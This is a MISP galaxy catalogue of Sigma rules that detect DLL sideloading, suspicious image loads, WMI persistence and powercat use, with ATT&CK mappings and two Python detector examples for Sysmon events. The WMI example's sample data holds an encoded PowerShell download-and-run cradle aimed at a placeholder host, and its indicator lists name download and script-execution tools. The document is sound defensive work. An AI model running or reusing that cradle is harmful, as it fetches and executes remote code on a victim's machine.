https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

https://securelist.com/apt-luminousmoth/103332/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml

PCRE.NET Package Image Load

Detects processes loading modules related to PCRE.NET package

The tag is: misp-galaxy:sigma-rules="PCRE.NET Package Image Load"

PCRE.NET Package Image Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9572. Table References

Links

https://twitter.com/rbmaslen/status/1321859647091970051

https://twitter.com/tifkin_/status/1321916444557365248

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml

Time Travel Debugging Utility Usage - Image

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

The tag is: misp-galaxy:sigma-rules="Time Travel Debugging Utility Usage - Image"

Time Travel Debugging Utility Usage - Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9573. Table References

Links

https://twitter.com/oulusoyum/status/1191329746069655553

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

https://twitter.com/mattifestation/status/1196390321783025666

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_tttracer_module_load.yml

Potential DLL Sideloading Via ClassicExplorer32.dll

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via ClassicExplorer32.dll"

Potential DLL Sideloading Via ClassicExplorer32.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9574. Table References

Links

https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml

Potential DLL Sideloading Of DBGHELP.DLL

Detects DLL sideloading of "dbghelp.dll"

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of DBGHELP.DLL"

Potential DLL Sideloading Of DBGHELP.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9575. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml

Potential RoboForm.DLL Sideloading

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

The tag is: misp-galaxy:sigma-rules="Potential RoboForm.DLL Sideloading"

Potential RoboForm.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9576. Table References

Links

https://twitter.com/StopMalvertisin/status/1648604148848549888

https://twitter.com/t3ft3lb/status/1656194831830401024

https://www.roboform.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml

HackTool - SILENTTRINITY Stager DLL Load

Detects SILENTTRINITY stager dll loading activity

The tag is: misp-galaxy:sigma-rules="HackTool - SILENTTRINITY Stager DLL Load"

HackTool - SILENTTRINITY Stager DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 9577. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml

Potential Mpclient.DLL Sideloading

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading"

Potential Mpclient.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9578. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_windows_defender.yml

DLL Loaded From Suspicious Location Via Cmspt.EXE

Detects cmstp loading "dll" or "ocx" files from suspicious locations

The tag is: misp-galaxy:sigma-rules="DLL Loaded From Suspicious Location Via Cmspt.EXE"

DLL Loaded From Suspicious Location Via Cmspt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9579. Table References

Links

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml

Potential Libvlc.DLL Sideloading

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

The tag is: misp-galaxy:sigma-rules="Potential Libvlc.DLL Sideloading"

Potential Libvlc.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9580. Table References

Links

https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html

https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml

Active Directory Parsing DLL Loaded Via Office Application

Detects DSParse DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="Active Directory Parsing DLL Loaded Via Office Application"

Active Directory Parsing DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9581. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dsparse_dll_load.yml

PowerShell Core DLL Loaded Via Office Application

Detects PowerShell core DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="PowerShell Core DLL Loaded Via Office Application"

Table 9582. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_powershell_dll_load.yml

Potential SmadHook.DLL Sideloading

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

The tag is: misp-galaxy:sigma-rules="Potential SmadHook.DLL Sideloading"

Potential SmadHook.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9583. Table References

Links

https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/

https://www.qurium.org/alerts/targeted-malware-against-crph/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_smadhook.yml

DLL Load By System Process From Suspicious Locations

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

The tag is: misp-galaxy:sigma-rules="DLL Load By System Process From Suspicious Locations"

DLL Load By System Process From Suspicious Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 9584. Table References

Links

https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml

Potential Edputil.DLL Sideloading

Detects potential DLL sideloading of "edputil.dll"

The tag is: misp-galaxy:sigma-rules="Potential Edputil.DLL Sideloading"

Potential Edputil.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9585. Table References

Links

https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_edputil.yml

GAC DLL Loaded Via Office Applications

Detects any GAC DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="GAC DLL Loaded Via Office Applications"

GAC DLL Loaded Via Office Applications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9586. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml

DLL Sideloading Of ShellChromeAPI.DLL

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter.

The tag is: misp-galaxy:sigma-rules="DLL Sideloading Of ShellChromeAPI.DLL"

DLL Sideloading Of ShellChromeAPI.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9587. Table References

Links

https://mobile.twitter.com/0gtweet/status/1564131230941122561

https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shell_chrome_api.yml

Potential Iviewers.DLL Sideloading

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

The tag is: misp-galaxy:sigma-rules="Potential Iviewers.DLL Sideloading"

Potential Iviewers.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9588. Table References

Links

https://www.secureworks.com/research/shadowpad-malware-analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_iviewers.yml

Suspicious Volume Shadow Copy Vsstrace.dll Load

Detects the image load of VSS DLL by uncommon executables

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy Vsstrace.dll Load"

Suspicious Volume Shadow Copy Vsstrace.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9589. Table References

Links

https://github.com/ORCx41/DeleteShadowCopies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml

Active Directory Kerberos DLL Loaded Via Office Application

Detects Kerberos DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="Active Directory Kerberos DLL Loaded Via Office Application"

Active Directory Kerberos DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9590. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_kerberos_dll_load.yml

Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="Wmiprvse Wbemcomn DLL Hijack"

Wmiprvse Wbemcomn DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9591. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml

Microsoft VBA For Outlook Addin Loaded Via Outlook

Detects the outlvba DLL (Microsoft VBA for Outlook Addin) being loaded by the Outlook process.

The tag is: misp-galaxy:sigma-rules="Microsoft VBA For Outlook Addin Loaded Via Outlook"

Microsoft VBA For Outlook Addin Loaded Via Outlook has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9592. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_outlook_outlvba_load.yml

Windows Spooler Service Suspicious Binary Load

Detects a DLL being loaded by the Print Spooler service (spoolsv.exe) from the spooler backup folder.

The tag is: misp-galaxy:sigma-rules="Windows Spooler Service Suspicious Binary Load"

Windows Spooler Service Suspicious Binary Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9593. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/ly4k/SpoolFool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml

Microsoft Office DLL Sideload

Detects DLL sideloading of DLLs that are part of Microsoft Office when they are loaded from a non-standard location.

The tag is: misp-galaxy:sigma-rules="Microsoft Office DLL Sideload"

Microsoft Office DLL Sideload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9594. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE"

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9595. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml

VBA DLL Loaded Via Office Application

Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.

The tag is: misp-galaxy:sigma-rules="VBA DLL Loaded Via Office Application"

VBA DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9596. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_vbadll_load.yml

Potential Chrome Frame Helper DLL Sideloading

Detects potential DLL sideloading of "chrome_frame_helper.dll"

The tag is: misp-galaxy:sigma-rules="Potential Chrome Frame Helper DLL Sideloading"

Potential Chrome Frame Helper DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9597. Table References

Links

https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml
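The ShellChromeAPI, iviewers.dll, Office DLL, libcurl.dll/gup.exe and chrome_frame_helper.dll rules above all share one detection shape: a Sysmon Event ID 7 (ImageLoad) record whose loaded DLL has a known name but comes from a directory it does not normally live in, optionally restricted to a particular loading process. The following is an added example, not code from the MISP galaxy or from the Sigma project, that applies that pattern to constructed Sysmon records. The watch list, the expected install directories and the sample events are assumptions for illustration; Sysmon's real field names (Image, ImageLoaded) are used.

```python
import ntpath

# Watch list: DLL basename -> the loaders that normally pull it in (None = any)
# and the directories it is expected to be loaded from. ASSUMED values for
# illustration; a real deployment would derive them from hijacklibs.net and the
# organisation's own install paths. ShellChromeAPI.dll does not ship with
# Windows, so its empty directory list means any load of it is reported.
WATCHLIST = {
    "shellchromeapi.dll": {"loaders": ("deviceenroller.exe",), "dirs": ()},
    "iviewers.dll": {"loaders": None,
                     "dirs": (r"c:\program files\windows kits",
                              r"c:\program files (x86)\windows kits")},
    "libcurl.dll": {"loaders": ("gup.exe",),
                    "dirs": (r"c:\program files\notepad++\updater",
                             r"c:\program files (x86)\notepad++\updater")},
    "chrome_frame_helper.dll": {"loaders": None,
                                "dirs": (r"c:\program files\google\chrome\application",
                                         r"c:\program files (x86)\google\chrome\application")},
}


def _norm(path):
    """Normalise a Windows path for comparison: backslashes, lower case, trimmed."""
    return path.replace("/", "\\").strip().lower()


def is_sideload(event):
    """Return True for a Sysmon EID 7 record whose ImageLoaded is a watched DLL
    loaded from outside its expected directories (by a watched loader, if any)."""
    loaded = _norm(event.get("ImageLoaded", ""))
    entry = WATCHLIST.get(ntpath.basename(loaded))
    if entry is None:
        return False
    loader = ntpath.basename(_norm(event.get("Image", "")))
    if entry["loaders"] is not None and loader not in entry["loaders"]:
        return False
    loaded_dir = ntpath.dirname(loaded)
    # A DLL is fine if it sits in, or below, one of its expected directories.
    return not any(loaded_dir == d or loaded_dir.startswith(d + "\\")
                   for d in entry["dirs"])


def find_sideloads(events):
    """Filter a list of EID 7 records down to the side-loading candidates."""
    return [e for e in events if is_sideload(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Program Files\Google\Chrome\Application\chrome_frame_helper.dll"},
    {"Image": r"C:\Users\Public\Downloads\chrome_frame_helper.exe",
     "ImageLoaded": r"C:\Users\Public\Downloads\chrome_frame_helper.dll"},
    {"Image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "ImageLoaded": r"C:\Program Files\Notepad++\updater\libcurl.dll"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\gup.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\libcurl.dll"},
    {"Image": r"C:\Windows\System32\DeviceEnroller.exe",
     "ImageLoaded": r"C:\Users\Public\ShellChromeAPI.dll"},
    {"Image": r"C:\Program Files (x86)\Windows Kits\10\bin\10.0.19041.0\x64\oleview.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Windows Kits\10\bin\10.0.19041.0\x64\iviewers.dll"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for hit in find_sideloads(SAMPLE_EVENTS):
        print("side-load candidate:", hit["Image"], "->", hit["ImageLoaded"])
```

The allow-listed directories are what make this useful in practice: without them the rule degrades to "this DLL name was loaded", which fires on every legitimate start of the host application. Expect tuning per estate, because portable or per-user installs put the same DLLs under user-writable paths.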

CLR DLL Loaded Via Office Applications

Detects CLR DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="CLR DLL Loaded Via Office Applications"

CLR DLL Loaded Via Office Applications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9598. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml

CredUI.DLL Loaded By Uncommon Process

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

The tag is: misp-galaxy:sigma-rules="CredUI.DLL Loaded By Uncommon Process"

CredUI.DLL Loaded By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 9599. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password

https://github.com/S12cybersecurity/RDPCredentialStealer

https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml

Suspicious Encoded Scripts in a WMI Consumer

Detects suspicious encoded payloads in WMI Event Consumers

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded Scripts in a WMI Consumer"

Suspicious Encoded Scripts in a WMI Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9600. Table References

Links

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml

WMI Event Subscription

Detects creation of WMI event subscription persistence method

The tag is: misp-galaxy:sigma-rules="WMI Event Subscription"

WMI Event Subscription has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9601. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml

Suspicious Scripting in a WMI Consumer

Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers

The tag is: misp-galaxy:sigma-rules="Suspicious Scripting in a WMI Consumer"

Suspicious Scripting in a WMI Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 9602. Table References

Links

https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
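The three WMI rules above (Suspicious Encoded Scripts in a WMI Consumer, WMI Event Subscription, Suspicious Scripting in a WMI Consumer) work on Sysmon Event IDs 19, 20 and 21, which record the filter, the consumer and the binding between them. The following is an added example, not code from the MISP galaxy or from the Sigma project, that correlates constructed records of those three types and reports any binding whose consumer command looks like a scripting or encoded payload. The indicator lists and the sample events are assumptions for illustration; the record field names (Name, Query, Destination, Consumer, Filter) follow Sysmon.

```python
import base64
import re

# Substrings a command-line consumer should not normally contain. ASSUMED list
# for illustration; the Sigma rules carry their own.
SCRIPTING_INDICATORS = ("powershell", "wscript", "cscript", "mshta", "rundll32",
                        "new-object", "system.net.webclient", "downloadstring",
                        "invoke-expression", "iex(", "iex ")
# Base64 prefixes of a PE ("MZ...") and of a gzip stream, as they appear in
# consumers that carry an embedded binary or compressed script.
ENCODED_PREFIXES = ("TVqQ", "H4sI")
B64_ARG = re.compile(r"-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
NAME_RE = re.compile(r'Name="([^"]+)"')


def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    m = B64_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_consumer(event):
    """Return the reasons an EID 20 (WmiEventConsumer) record looks malicious."""
    dest = event.get("Destination", "")
    low = dest.lower()
    reasons = []
    if any(tok in low for tok in SCRIPTING_INDICATORS):
        reasons.append("scripting/powershell in consumer command")
    if any(p in dest for p in ENCODED_PREFIXES):
        reasons.append("base64 PE or gzip blob in consumer command")
    decoded = decode_encoded_command(dest)
    if decoded and any(tok in decoded.lower() for tok in SCRIPTING_INDICATORS):
        reasons.append("encoded command decodes to a download/exec cradle")
    return reasons


def object_name(ref):
    """Extract BotConsumer23 from 'CommandLineEventConsumer.Name="BotConsumer23"'."""
    m = NAME_RE.search(ref)
    return m.group(1) if m else ref


def suspicious_subscriptions(events):
    """Correlate EID 19/20/21 records; report bindings whose consumer is suspicious."""
    filters = {e["Name"]: e.get("Query", "") for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    hits = []
    for e in events:
        if e["EventID"] != 21:
            continue
        cname = object_name(e["Consumer"])
        fname = object_name(e["Filter"])
        reasons = assess_consumer(consumers.get(cname, {}))
        if reasons:
            hits.append({"filter": fname, "query": filters.get(fname, ""),
                         "consumer": cname, "reasons": reasons})
    return hits


# Constructed sample: one classic persistence triple and one benign-looking one.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
ENC_CRADLE = base64.b64encode(CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 19, "Name": "BotFilter82", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Name": "BotConsumer23", "Type": "Command Line",
     "Destination": f"powershell.exe -NoP -W Hidden -enc {ENC_CRADLE}"},
    {"EventID": 21, "Consumer": 'CommandLineEventConsumer.Name="BotConsumer23"',
     "Filter": '__EventFilter.Name="BotFilter82"'},
    {"EventID": 19, "Name": "AgentHealthFilter", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceCreationEvent WITHIN 300 "
              "WHERE TargetInstance ISA 'Win32_NTLogEvent'"},
    {"EventID": 20, "Name": "AgentHealthConsumer", "Type": "Command Line",
     "Destination": "C:\\Program Files\\ExampleVendor\\agent.exe --heartbeat"},
    {"EventID": 21, "Consumer": 'CommandLineEventConsumer.Name="AgentHealthConsumer"',
     "Filter": '__EventFilter.Name="AgentHealthFilter"'},
]

if __name__ == "__main__":
    for hit in suspicious_subscriptions(SAMPLE_EVENTS):
        print(hit["filter"], "->", hit["consumer"], hit["reasons"])
```

Decoding the -EncodedCommand argument before matching is what separates this from a plain keyword rule: an encoded cradle contains none of the indicator strings in clear text, and the base64 itself is unique per payload.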

Netcat The Powershell Version

Detects the use of powercat, a PowerShell implementation of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network.

The tag is: misp-galaxy:sigma-rules="Netcat The Powershell Version"

Netcat The Powershell Version has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 9603. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md

https://github.com/besimorhino/powercat

https://nmap.org/ncat/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml

Suspicious Non PowerShell WSMAN COM Provider

Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

